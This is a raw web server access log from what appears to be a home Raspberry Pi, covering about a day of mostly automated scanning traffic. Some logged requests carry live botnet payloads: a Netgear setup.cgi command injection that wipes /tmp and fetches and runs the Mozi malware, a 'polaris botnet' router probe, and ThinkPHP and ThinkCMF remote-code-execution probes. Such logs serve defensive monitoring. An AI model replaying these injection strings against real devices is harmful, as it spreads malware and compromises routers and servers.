Sun Mar 29 06:25:11 MDT 2020 06:25:11 up 33 days, 10:53, 1 user, load average: 0.55, 0.28, 0.21 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 24Feb20 33days 27:09 1.72s /usr/bin/lxsession -s LXDE-pi -e LXDE 177.95.233.189 - - [29/Mar/2020:14:46:28 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 194.219.214.6 - - [29/Mar/2020:15:32:02 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 171.67.70.85 - - [29/Mar/2020:16:00:00 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 100.12.30.248 - - [29/Mar/2020:16:26:02 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 100.12.30.248 - - [29/Mar/2020:16:26:03 +0000] "GET / HTTP/1.1" 200 25000 "" "" 169.197.108.6 - - [29/Mar/2020:16:31:24 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 " 103.135.38.183 - - [29/Mar/2020:16:53:25 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 178.73.215.171 - - [29/Mar/2020:17:57:11 +0000] "GET / HTTP/1.0" 200 25000 "" "" 106.13.123.125 - - [29/Mar/2020:18:32:55 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 106.13.123.125 - - [29/Mar/2020:18:32:56 +0000] "GET /TP/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 106.13.123.125 - - [29/Mar/2020:18:32:56 +0000] "GET /TP/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 106.13.123.125 - - [29/Mar/2020:18:32:57 +0000] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 106.13.123.125 - - [29/Mar/2020:18:32:57 +0000] "GET 
/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 106.13.123.125 - - [29/Mar/2020:18:32:58 +0000] "GET /public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 106.13.123.125 - - [29/Mar/2020:18:32:59 +0000] "GET /TP/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 106.13.123.125 - - [29/Mar/2020:18:32:59 +0000] "GET /elrekt.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 106.13.123.125 - - [29/Mar/2020:18:33:00 +0000] "GET /index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 106.13.123.125 - - [29/Mar/2020:18:33:01 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 110.43.48.117 - - [29/Mar/2020:18:41:09 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.243.133.29 - - [29/Mar/2020:18:50:35 +0000] "GET /hudson HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 185.153.199.118 - - [29/Mar/2020:20:28:27 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 189.213.27.104 - - [29/Mar/2020:20:49:43 +0000] "POST /boaform/admin/formPing HTTP/1.1" 400 0 "" "polaris botnet" 189.213.27.104 - - [29/Mar/2020:20:49:43 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 171.67.70.85 - - [29/Mar/2020:21:03:13 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 153.164.240.201 - - [29/Mar/2020:23:04:32 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/&currentsetting.htm=1 HTTP/1.1" 400 0 "" "Mozilla/5.0" 153.164.240.201 - - [29/Mar/2020:23:04:36 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [30/Mar/2020:00:20:36 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.36 (KHTML, like Gecko) Raspbian Chromium/72.0.3626.121 Chrome/72.0.3626.121 
Safari/537.36" 162.250.19.7 - - [30/Mar/2020:00:20:37 +0000] "GET /favicon.ico HTTP/1.1" 304 0 "http://162.250.19.7/" "Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.36 (KHTML, like Gecko) Raspbian Chromium/72.0.3626.121 Chrome/72.0.3626.121 Safari/537.36" 162.250.19.7 - - [30/Mar/2020:00:20:52 +0000] "GET /ac0xl/ HTTP/1.1" 200 25000 "http://162.250.19.7/" "Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.36 (KHTML, like Gecko) Raspbian Chromium/72.0.3626.121 Chrome/72.0.3626.121 Safari/537.36" 162.250.19.7 - - [30/Mar/2020:00:20:56 +0000] "GET /ac0xl/logs/ HTTP/1.1" 200 25000 "http://162.250.19.7/ac0xl/" "Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.36 (KHTML, like Gecko) Raspbian Chromium/72.0.3626.121 Chrome/72.0.3626.121 Safari/537.36" 162.250.19.7 - - [30/Mar/2020:00:21:25 +0000] "GET /ac0xl/logs/2020.03.29 HTTP/1.1" 200 5666 "http://162.250.19.7/ac0xl/logs/" "Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.36 (KHTML, like Gecko) Raspbian Chromium/72.0.3626.121 Chrome/72.0.3626.121 Safari/537.36" 64.225.79.45 - - [30/Mar/2020:01:16:27 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 64.225.79.45 - - [30/Mar/2020:01:16:28 +0000] "GET / HTTP/1.0" 200 25000 "" "" 134.122.102.24 - - [30/Mar/2020:01:16:58 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 134.122.102.24 - - [30/Mar/2020:01:16:58 +0000] "GET / HTTP/1.0" 200 25000 "" "" 134.122.102.24 - - [30/Mar/2020:01:16:58 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 134.122.102.24 - - [30/Mar/2020:01:16:59 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 134.122.102.24 - - [30/Mar/2020:01:17:00 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 134.122.102.24 - - [30/Mar/2020:01:17:01 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 134.122.102.24 - - [30/Mar/2020:01:17:01 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 134.122.102.24 - - [30/Mar/2020:01:17:03 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 134.122.102.24 - - [30/Mar/2020:01:17:03 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 134.122.102.24 - - [30/Mar/2020:01:17:06 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 134.122.102.24 - - [30/Mar/2020:01:17:08 
+0000] "UNKNOWN UNKNOWN" 400 0 "" "" 134.122.102.24 - - [30/Mar/2020:01:17:09 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.243.128.176 - - [30/Mar/2020:01:18:04 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 134.122.102.24 - - [30/Mar/2020:01:18:07 +0000] "UNKNOWN UNKNOWN" 408 0 "" "" 164.68.112.178 - - [30/Mar/2020:02:23:17 +0000] "GET / HTTP/1.0" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36" 83.97.20.33 - - [30/Mar/2020:02:45:08 +0000] "GET / HTTP/1.0" 200 25000 "" "" 94.140.114.53 - - [30/Mar/2020:02:48:17 +0000] "GET / HTTP/1.0" 200 25000 "" "Pandalytics/1.0 (https://domainsbot.com/pandalytics/)" 46.174.115.14 - - [30/Mar/2020:03:36:08 +0000] "GET /test.txt HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 46.174.115.14 - - [30/Mar/2020:03:36:12 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 46.174.115.14 - - [30/Mar/2020:03:36:15 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 171.67.70.85 - - [30/Mar/2020:03:47:01 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 185.141.105.166 - - [30/Mar/2020:04:17:07 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 162.243.129.83 - - [30/Mar/2020:04:38:47 +0000] "GET /manager/text/list HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 223.155.82.187 - - [30/Mar/2020:04:59:36 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 0 "" "" 186.31.68.157 - - [30/Mar/2020:05:15:54 +0000] "POST /boaform/admin/formPing HTTP/1.1" 400 0 "" "polaris botnet" 186.31.68.157 - - [30/Mar/2020:05:15:54 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 173.249.51.194 - - [30/Mar/2020:05:19:57 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 60.191.52.254 - - 
[30/Mar/2020:06:19:32 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 60.191.52.254 - - [30/Mar/2020:06:19:34 +0000] "HEAD / HTTP/1.1" 200 0 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36" 197.232.2.18 - - [30/Mar/2020:09:34:39 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 5.101.0.209 - - [30/Mar/2020:09:37:28 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 5.101.0.209 - - [30/Mar/2020:09:49:56 +0000] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 5.101.0.209 - - [30/Mar/2020:09:49:57 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 5.101.0.209 - - [30/Mar/2020:09:56:22 +0000] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 167.114.89.197 - - [30/Mar/2020:10:00:51 +0000] "HEAD /1Jlv HTTP/1.1" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36" 171.67.70.85 - - [30/Mar/2020:10:01:45 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 51.38.57.199 - - [30/Mar/2020:10:17:38 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 162.243.128.177 - - [30/Mar/2020:12:07:14 +0000] "GET /portal/redlion HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" Mon Mar 30 06:25:06 MDT 2020 06:25:06 up 34 
days, 10:53, 1 user, load average: 0.27, 0.23, 0.24 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 24Feb20 34days 28:07 1.96s /usr/bin/lxsession -s LXDE-pi -e LXDE